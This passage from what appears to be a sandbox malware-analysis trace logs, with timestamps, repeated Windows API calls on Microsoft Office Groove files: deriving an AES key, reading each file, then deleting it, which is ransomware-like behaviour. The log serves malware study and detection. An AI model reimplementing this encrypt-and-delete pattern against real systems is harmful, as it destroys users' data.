lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.648] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.648] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.648] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.650] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_decreaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_decreaseindent.gif")) returned 1 [0170.652] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.653] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.653] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.653] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.653] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf1 [0170.653] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.655] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.655] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.655] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.657] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_hyperlink.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_hyperlink.gif")) returned 1 [0170.658] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.659] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.659] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.659] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.659] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35d [0170.659] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.662] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.662] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.662] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.664] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_increaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_increaseindent.gif")) returned 1 [0170.666] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.666] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.666] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.666] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.666] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x354 [0170.667] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.774] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.774] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.774] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.776] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_italic.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_italic.gif")) returned 1 [0170.777] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.778] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.778] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.778] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.778] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x352 [0170.778] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.809] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.809] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.809] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.811] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_justify.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_justify.gif")) returned 1 [0170.812] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.813] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.813] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.813] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.813] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x373 [0170.813] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.852] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.852] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.852] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.854] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_pressed.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_pressed.gif")) returned 1 [0170.856] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.856] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.856] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.857] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.857] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa0 [0170.857] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.858] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.858] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.858] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.860] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_spellcheck.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_spellcheck.gif")) returned 1 [0170.862] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.863] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.863] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.863] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.863] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35c [0170.863] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.865] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.865] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.865] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.867] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\rtf_underline.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\rtf_underline.gif")) returned 1 [0170.868] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.868] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.869] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.869] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.869] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xca5a [0170.869] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.914] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.914] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.914] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.915] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\utilityfunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\utilityfunctions.js")) returned 1 [0170.917] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.918] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.918] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.918] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.918] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x64b3 [0170.918] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.938] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.938] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.938] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.939] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\validation.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\validation.js")) returned 1 [0170.941] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.942] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.942] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.942] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.942] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd78 [0170.942] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.944] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.945] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.945] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.946] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\viewheaderpreview.jpg")) returned 1 [0170.948] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.948] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.948] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.948] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.948] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0170.948] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.949] CryptDestroyHash (hHash=0x284d728) returned 1 [0170.949] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.949] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\_help.txt")) returned 1 [0170.982] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0170.984] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.984] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.985] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.985] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.985] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xae8 [0170.985] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0170.996] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.997] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.997] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.998] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\attention.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\attention.gif")) returned 1 [0170.999] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0170.999] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0170.999] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.999] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0170.999] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x43a [0171.000] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.008] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.008] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.008] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.009] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsblankpage.html")) returned 1 [0171.011] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.011] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.011] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.011] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.011] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x829 [0171.011] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.013] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.013] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.013] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.015] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsbrowserupgrade.html")) returned 1 [0171.016] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.016] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.016] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.016] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.016] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ef [0171.017] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.019] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.019] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.019] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.020] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsColorChart.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formscolorchart.html")) returned 1 [0171.021] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.022] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.022] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.022] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.022] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13bb [0171.022] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.036] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.036] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.036] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.037] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsformtemplate.html")) returned 1 [0171.038] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.039] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.039] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.039] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.039] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13c5 [0171.039] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.042] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.042] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.042] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.043] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsFormTemplateRTL.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsformtemplatertl.html")) returned 1 [0171.045] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.045] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.045] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.045] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.045] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8ab [0171.045] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.047] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.047] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.047] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.049] DeleteFileW 